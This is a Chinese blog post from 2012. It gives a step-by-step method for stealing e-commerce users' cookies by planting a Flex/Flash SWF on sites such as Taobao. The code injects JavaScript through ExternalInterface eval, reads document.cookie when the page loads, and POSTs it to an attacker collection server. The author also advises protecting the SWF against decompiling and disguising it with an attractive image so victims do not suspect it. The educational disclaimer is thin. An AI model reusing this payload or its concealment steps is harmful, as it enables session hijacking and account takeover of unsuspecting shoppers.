利用flex悄悄获取商业网站的Cookie(XSS跨站进攻)

2012-12-26

利用flex悄悄获取商业网站的Cookie(XSS跨站攻击)现在电子商务越来越活，电子商务网上购物已经成为我们生活

利用flex悄悄获取商业网站的Cookie(XSS跨站攻击)

现在电子商务越来越活，电子商务网上购物已经成为我们生活中不可缺少的一部分。因此，电子商务网站的安全在电子商务网站也是很重要的部分。保护网站用户身份安全，保护用户的密码账号,Cookies已经成为网上交易安全最重要的一部分。难怪拍拍网，淘宝网的登录页面变化很快，里面内容也是越丰富，里面安装的ActiveX控件经常变，登录前帐号密码发送加密方式也不断变化。一旦用户的cookies被窃取了，视乎拿到cookies不法者只要使用得当就可以实现用户的成为，比如修改你的个人信息，网上购物等等。当然，本文这里倒不是说要获取别人的东西，而是要大家明白这个原理等到你自己做类似网站安全注意这个东东，知彼知己，百战不胜嘛。

???? 我们拿淘宝网的东东来说说吧，里面安全还是做的不错，目前外部提交的包含javascript,ifrane链接外部等XSS攻击的代码都被屏蔽了。不过flex(flash)还是可以运行的，但是要交钱和审核过flash才可以好像。通常，获取cookies方法在你要攻击的网站页面上嵌入javascript：比如：

http://收集cookies网站入口/xxxxxx.xx/？cookie=document.cookies

或者嵌入一个iframe，在iframe实现类是上面的源码。这样用户的cookie就拿到手了。不过一般的大型电子商务网站比如淘宝网都已经屏蔽这些了。所以利用js,iframe是无法实现的。我想到最后一交就是将flash嵌入到要攻击的网站页面，然后在flash运行时候动态嵌入js到页面上（前提是必须是flash没有被屏蔽）。这样js并没有提交电子网站上，一般是不被发现了。当然我说的是一般哦。呵呵。好了开始实现获取cookie flash代码吧：

package? luodongfu.test.stealcookie

{
??????? import flash.external.ExternalInterface;???
??????? import mx.controls.Alert;?
??????? public class CookieStealer
??????? {
????????????????
??????????????? /**
???????????????? * 绑定js?，运行时候嵌入到页面上，秘密就在这里。
???????????????? */???????????????
??????????????? public static function embedJS():void

????????????? {
?var str:String = "";
???????????????????????
??????????????????????? //设置cookie
??????????????????????? str += 'function setCookie_(name, value, expires, security) {' +
??????????????????????????????????????? '??????? var str = name + "=" + escape(value);' +
??????????????????????????????????????? '??????? if (expires != null) str += ";expires=" + new Date(expires).toGMTString() + "";' +
??????????????????????????????????????? '??????? if (security == true) str += ";secure";' +
??????????????????????????????????????? '??????? document.cookie = str;' +
??????????????????????????????????????? '}';
???????????????????????
??????????????????????? //获取cookie???????
??????????????????????? str += 'function getCookie_(name) {' +
??????????????????????????????????????? '??????? var arr = document.cookie.match(new RegExp(";?" +name + "=([^;]*)"));' +
?????????????????????????????????????????? '??????? if(arr != null) return unescape(arr[1]); ' +?
?? '??????? return null;' +
??????????????????????????????????????? '}';
??????????
??????????
??????????? str += 'function getCookieAll() {' +
?????????????????????????
?????????????????????????????????????????? '??????? return document.cookie;' +
??????????????????????????????????????? '}';
??????????
???????????????????????
??????????????????????? str += 'function deleteCookie_(name) {' +?
?????????????????????????? ?? '??????? var d = new Date();' +
??????????????????????????????????????? '??????? d.setTime(d.getTime() - 1);' +
??????????????????????????????????????? '??????? var value = getCookie_(name);' +
??????????????????????????????????????? '??????? if(value != null) {' +
??????????????????????????????????????? '??????????????? alert(document.cookie);document.cookie = name + "=" + escape(value) + ";expire=" + d.toGMTString();' +
??????????????????????????????????????? '??????? }' +
??????????????????????????????????????? '}';
??????????????????????? if (ExternalInterface.available) {
??????????????????????????????? ExternalInterface.call("eval", str);
????????????????????????????
??????????????????????? }
??????????????? }
????????????????
/**
???????????????? * 获取cookie值?
???????????????? * @param name
???????????????? * @return
???????????????? *
???????????????? */???????????????
??????????????? public static function getCookie(name:String):String {
??????????????????????? if (ExternalInterface.available) {
??????????????????????????????? return ExternalInterface.call("getCookie_", name);
??????????????????????? }
???????????????????????
??????????????????????? return null;
??????????????? }
????
???? public static function getAvailable():Boolean {
??????????????????????
??????????????????????? return ExternalInterface.available;
??????????????? }
???????????????
??????????????? /**
???????????????? * 删除cookie
? *
???????????????? * @param name
???????????????? *
???????????????? */???????????????
??????????????? public static function deleteCookie(name:String):void {
??????????????????????? if (ExternalInterface.available) {
??????????????????????????????? ExternalInterface.call("deleteCookie_", name);
??????????????????????? }
??????????????? }
??????? }
}

好了，万事具备，只欠东风了，就是调用以上嵌入代码写到页面上。

<mx:Application xmlns:mx="http://www.adobe.com/2006/mxml" layout="absolute" creationComplete="stealCookieNow()" width="60" height="20">
? <mx:Script>??
??????? <![CDATA[
??????? import luodongfu.test.stealcookie.CookieStealer;
?????????? import mx.controls.Alert;

//flash一旦被下载到用户浏览器自动运行这段嵌入js
?????? public function stealCookieNow():void
?????? {
??????????????CookieStealer.embedJS();
?????????????? if (ExternalInterface.available)
???????????????? {
???????????????? ?var cook:String="";????
??????? ??????? try?
??????????????????? {? //这句话得到cookie
?????????????????????? cook= ExternalInterface.call("getCookieAll");
??????????????????? }
????????????????? ?catch (error:Error)
???????????????????? {
???????????????????????? Alert.show("Error");
???????????????????? }
?????????????????//得到cookie之后赶紧把他送到你服务器吧，cookie是有期限哦，要用就赶紧使用吧?????以下代码就是发送cookie到你的网站

???????????? var request:URLRequest = new URLRequest("http://cookiecollection.com/cookiehere");??

?????????????????var params:URLVariables = new URLVariables();

params.cookie=cook;
???????????????? request.data=params;

?????????????? request.method=URLRequestMethod.POST;
???????????? ? loader.load(request);

?}
???????????????? else {
????????????????? Alert.show("ExternalInterface not avalible");
????????????????? }
????
???????????? }
???????????? ?
??????? ]]>???
</mx:Script>

</mx:Application>

编译你的flex工程生成swf文件CookieStealer.swf，这个flash文件就是窃取的挂马，呵呵。

为了保证你的挂马不被人家反编译过来查看，最后SWF Protect加密马甲生成CookieStealer2.swf一下吧。

好了，将你这个swf文件挂到你自己的收集cookies服务器在写一个HttpServlet来接受Cookie吧。

最后在电子商务网站(比如淘宝网的商品宝贝详情)可以提交html页面提交你的服务器swf网址吧。源码如下：

记得给你的swf文件搞个漂亮图片，不容易让人家怀疑，呵呵。这叫瞒天过海，知人知面不知心啊，呵呵

好了，收工，不要拿去在坏事哦，呵呵

热点排行